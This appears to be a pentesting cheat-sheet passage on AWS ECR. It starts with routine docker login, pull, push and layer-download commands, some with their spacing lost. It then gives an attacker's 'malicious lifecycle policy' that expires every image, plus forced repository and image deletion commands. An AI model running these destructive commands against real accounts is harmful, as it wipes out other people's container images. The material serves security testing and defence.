# Docker login into ecr## For public repo (always use us-east-1)awsecr-publicget-login-password--regionus-east-1|dockerlogin--usernameAWS--password-stdinpublic.ecr.aws/<random-id>## For private repoawsecrget-login-password--profile<profile_name>--region<region>|dockerlogin--usernameAWS--password-stdin<account_id>.dkr.ecr.<region>.amazonaws.com## If you need to acces an image from a repo if a different account, in <account_id> set the account number of the other account# Downloaddockerpull<account_id>.dkr.ecr.<region>.amazonaws.com/<repo_name>:latest## If you still have the error "Requested image not found"## It might be because the tag "latest" doesn't exit## Get valid tags with: TOKEN=$(aws--profile<profile>ecrget-authorization-token--outputtext--query'authorizationData[].authorizationToken')curl-i-H"Authorization: Basic $TOKEN"https://<account_id>.dkr.ecr.<region>.amazonaws.com/v2/<img_name>/tags/list# Inspect the imagedockerinspectsha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0# Upload (example uploading purplepanda with tag latest)dockertagpurplepanda:latest<account_id>.dkr.ecr.<region>.amazonaws.com/purplepanda:latestdockerpush<account_id>.dkr.ecr.<region>.amazonaws.com/purplepanda:latest# Downloading without Docker# List digestsawsecrbatch-get-image--repository-namelevel2 \--registry-id653711331788 \--image-idsimageTag=latest|jq'.images[].imageManifest | fromjson'## Download a digestawsecrget-download-url-for-layer \--repository-namelevel2 \--registry-id653711331788 \--layer-digest"sha256:edfaad38ac10904ee76c81e343abf88f22e6cfc7413ab5a8e4aeffc6a7d9087a"
After downloading the images you should check them for sensitive info:
An attacker with any of these permissions can create or modify a lifecycle policy to delete all images in the repository and then delete the entire ECR repository. This would result in the loss of all container images stored in the repository.
bashCopycode#CreateaJSONfilewiththemaliciouslifecyclepolicyecho'{ "rules": [ { "rulePriority": 1, "description": "Delete all images", "selection": { "tagStatus": "any", "countType": "imageCountMoreThan", "countNumber": 0 }, "action": { "type": "expire" } } ]}'>malicious_policy.json# Apply the malicious lifecycle policy to the ECR repositoryawsecrput-lifecycle-policy--repository-nameyour-ecr-repo-name--lifecycle-policy-textfile://malicious_policy.json# Delete the ECR repositoryawsecrdelete-repository--repository-nameyour-ecr-repo-name--force# Delete the ECR public repositoryawsecr-publicdelete-repository--repository-nameyour-ecr-repo-name--force# Delete multiple images from the ECR repositoryawsecrbatch-delete-image--repository-nameyour-ecr-repo-name--image-idsimageTag=latestimageTag=v1.0.0# Delete multiple images from the ECR public repositoryawsecr-publicbatch-delete-image--repository-nameyour-ecr-repo-name--image-idsimageTag=latestimageTag=v1.0.0